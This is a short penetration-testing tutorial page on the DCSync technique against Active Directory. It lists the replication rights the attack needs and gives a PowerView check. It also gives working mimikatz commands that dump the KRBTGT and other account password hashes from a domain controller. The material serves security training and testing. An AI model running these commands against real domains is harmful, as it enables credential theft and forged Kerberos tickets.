# DCSync

This attack simulates the behavior of a domain controller and asks other domain controllers to replicate information using the Directory Replication Service Remote Protocol ([MS-DRSR](https://msdn.microsoft.com/en-us/library/cc228086.aspx)). Basically, it lets you pretend to be a domain controller and ask for user password data.

This can be used by attackers to get any account’s NTLM hash including the KRBTGT account, which enables attackers to create [Golden Tickets](https://xedex.gitbook.io/internalpentest/active-directory/post-compromise-attacks/golden-tickets) .

The only pre-requisite to worry about is that you have an account with rights to perform domain replication. This is controlled by the Replicating Changes permissions set on the domain.

* The “[**DS-Replication-Get-Changes**](https://msdn.microsoft.com/en-us/library/ms684354\(v=vs.85\).aspx)” extended right
  * **CN:** DS-Replication-Get-Changes
  * **GUID:** 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
* The “[**Replicating Directory Changes All**](https://msdn.microsoft.com/en-us/library/ms684355\(v=vs.85\).aspx)” extended right
  * **CN:** DS-Replication-Get-Changes-All
  * **GUID:** 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
* The “[**Replicating Directory Changes In Filtered Set**](https://msdn.microsoft.com/en-us/library/hh338663\(v=vs.85\).aspx)” extended right (this one isn’t always needed but we can add it just in case :)
  * **CN:** DS-Replication-Get-Changes-In-Filtered-Set
  * **GUID:** 89e95b76-444d-4c62-991a-0facbeda640c

Now using powerview you can check the privileges by running :

```
Get-ObjectAcl -DistinguishedName "dc=fcorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
```

If you do have the necessary rights, the rest is quite simple. Simply execute the following command in mimikatz:

```
Lsadump::dcsync /domain:[YOUR DOMAIN ALTOUGH NOT NECESSARY] /user:[ANY USER WHOS PASSWORD DETAILS YOU WANT]
FOR EXAMPLE:
lsadump::dcsync /domain:fcorp.local /user:krbtgt
```

You can also do that via powerview :

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

Congratz  ;) 

More details and explanation :

{% embed url="<http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/>" %}

{% embed url="<https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/>" %}

{% embed url="<https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync>" %}